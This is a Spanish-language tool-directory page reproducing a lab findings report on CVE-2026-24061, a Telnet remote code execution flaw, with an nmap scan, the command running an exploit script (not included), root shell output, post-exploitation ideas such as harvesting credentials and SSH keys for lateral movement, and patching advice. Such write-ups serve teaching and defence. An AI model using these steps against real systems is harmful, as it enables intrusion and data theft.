Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CyberhawksLab-telnetCVE — Informe/hallazgo de CVE-2026-24061 dentro del laboratorio Cyberhawks | Kitploit
Herramientas/GitHubGitHub/skyejacobson/cyberhawkslab-telnetcve
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
skyejacobson/cyberhawkslab-telnetcve

CyberhawksLab-telnetCVE

Informe/hallazgo de CVE-2026-24061 dentro del laboratorio Cyberhawks

Ver Repositorio
11hace 22 díasAún no revisado
Compartir

Informe de hallazgos del laboratorio demo de CyberHawks

Créditos: @SafeBreach-Labs

CVE: CVE-2026-24061

Laboratorio: Cyberhawks Lab
Objetivo: 10.1.1.1 (demo.cyberhawks.lab)
ID del hallazgo: WU-08
Fecha: 2026-09-08
Severidad: Crítica
Estado: Confirmado / Explotado


Resumen Ejecutivo

Durante una evaluación del entorno de laboratorio de Cyberhawks, se identificó y explotó con éxito una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en el host objetivo (10.1.1.1). La explotación de CVE-2026-24061 a través de un servicio Telnet expuesto (TCP/23) resultó en una shell interactiva con privilegios de root, otorgando control administrativo total sobre el sistema.


Alcance y Entorno

CampoValor
IP del objetivo10.1.1.1
Nombre de host del objetivodemo.cyberhawks.lab
Sistema operativoLinux 6.12.41+deb13-amd64 (Debian 13)
SO del atacanteParrot OS
Tipo de evaluaciónPrueba de penetración (Entorno de laboratorio)

Reconocimiento

Escaneo de puertos

Se realizó un escaneo de versiones de servicios con Nmap contra el objetivo para enumerar puertos y servicios abiertos.

Comando:

nmap -sV 10.1.1.1

Resumen de resultados:

PuertoEstadoServicio
21/tcpAbiertoFTP (tcpwrapped)
22/tcpAbiertoSSH (tcpwrapped)
23/tcpAbiertoTelnet
25/tcpAbiertoSMTP (tcpwrapped)
53/tcpAbiertoDNS (tcpwrapped)
80/tcpAbiertoHTTP (tcpwrapped)
110/tcpAbiertoPOP3 (tcpwrapped)
111/tcpAbiertoRPC (tcpwrapped)
139/tcpAbiertoNetBIOS (tcpwrapped)
143/tcpAbiertoIMAP (tcpwrapped)
445/tcpAbiertoSMB (tcpwrapped)
2049/tcpAbiertoNFS (tcpwrapped)
3306/tcpAbiertoMySQL/MariaDB (tcpwrapped)
3389/tcpAbiertoRDP (tcpwrapped)
5901/tcpAbiertoVNC (tcpwrapped)

Observaciones notables:

  • El host expone una superficie de ataque amplia y preocupante en 15 puertos.
  • El puerto 23 (Telnet) era accesible, lo que lo convierte en un objetivo prioritario inmediato.
  • La presencia de Telnet — un protocolo inherentemente inseguro y en texto plano — en cualquier host moderno representa una configuración incorrecta crítica. Es probable que la versión del servicio sea explotable.

Detalles de la vulnerabilidad

CampoDetalle
CVECVE-2026-24061
Servicio afectadoTelnet (GNU inetutils 2.6, TCP/23)
Tipo de vulnerabilidadEjecución Remota de Código (RCE) no autenticada
Puntuación CVSSCrítica
Autenticación requeridaNinguna
Interacción del usuario requeridaNinguna

Descripción

CVE-2026-24061 es una vulnerabilidad de Ejecución Remota de Código no autenticada que afecta al componente del daemon Telnet de GNU inetutils 2.6. La explotación permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema objetivo con los privilegios del servicio en ejecución — en este caso, root.


Explotación

Herramienta / Exploit utilizado

Se ejecutó un script de exploit en Python creado específicamente (telnet_rce.py) dirigido a CVE-2026-24061 contra el servicio Telnet vulnerable.

Comando:

python3 telnet_rce.py 10.1.1.1

Salida del exploit:

[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.

Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)

root@demo:~#

Verificación posterior a la explotación

Tras obtener una shell, los siguientes comandos confirmaron el nivel de acceso alcanzado:

Verificación de identidad:

root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)

Enumeración del sistema de archivos:

root@demo:~# ls -la
total 36
drwx------  6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r--  1 root root  607 May 12  2025 .bashrc
drwx------  4 root root 4096 Sep  6  2025 .cache
drwxr-xr-x  3 root root 4096 Sep  6  2025 .config
drwxrwxr-x  3 root root 4096 Sep  6  2025 .local
-rw-------  1 root root  261 Sep  6  2025 .mariadb_history
-rw-r--r--  1 root root  132 May 12  2025 .profile
drwx------  2 root root 4096 Sep  6  2025 .ssh

Verificación de la versión del servicio

root@demo:~# telnet --version

telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

Hallazgos clave posteriores a la explotación:

  • .mariadb_history — indica uso activo de la base de datos MariaDB; potencial para una mayor recolección de credenciales o exfiltración de datos.
  • Directorio .ssh/ — puede contener claves privadas utilizables para movimiento lateral hacia otros hosts.
  • Se confirmó acceso completo de root (UID 0) sin necesidad de ningún paso de escalada de privilegios.

Impacto

CategoríaEvaluación
ConfidencialidadCrítica — todos los datos del sistema son accesibles
IntegridadCrítica — el atacante puede modificar o destruir cualquier dato
DisponibilidadCrítica — el atacante puede terminar servicios o bloquear el sistema

Se logró el compromiso total del sistema en un único paso no autenticado. Un atacante con acceso a este segmento de red podría:

  • Leer, modificar o exfiltrar todos los datos almacenados en el host.
  • Recolectar credenciales del historial de la shell, archivos de configuración y la base de datos MariaDB.
  • Usar claves SSH para pivotar lateralmente hacia otros hosts de la red.
  • Establecer persistencia (p. ej., cuentas de backdoor, trabajos cron, rootkits).
  • Interrumpir la disponibilidad de todos los servicios que se ejecutan en el host.

Recomendaciones

Inmediatas (Prioridad crítica)

  1. Aplicar parche o mitigar CVE-2026-24061 — Aplique el parche proporcionado por el proveedor para GNU inetutils si Telnet debe permanecer en uso. Verifique si hay un paquete actualizado:
    apt update && apt install inetutils-telnetd
    

Artefactos y Evidencia

ArtefactoDescripción
Salida del escaneo de NmapEnumeración completa de puertos/servicios de 10.1.1.1
telnet_rce.pyScript de exploit utilizado para desencadenar CVE-2026-24061
Registro de sesión de shellTranscripción de la shell interactiva de root

Informe preparado para Cyberhawks Lab — solo con fines educativos.

Descargar herramienta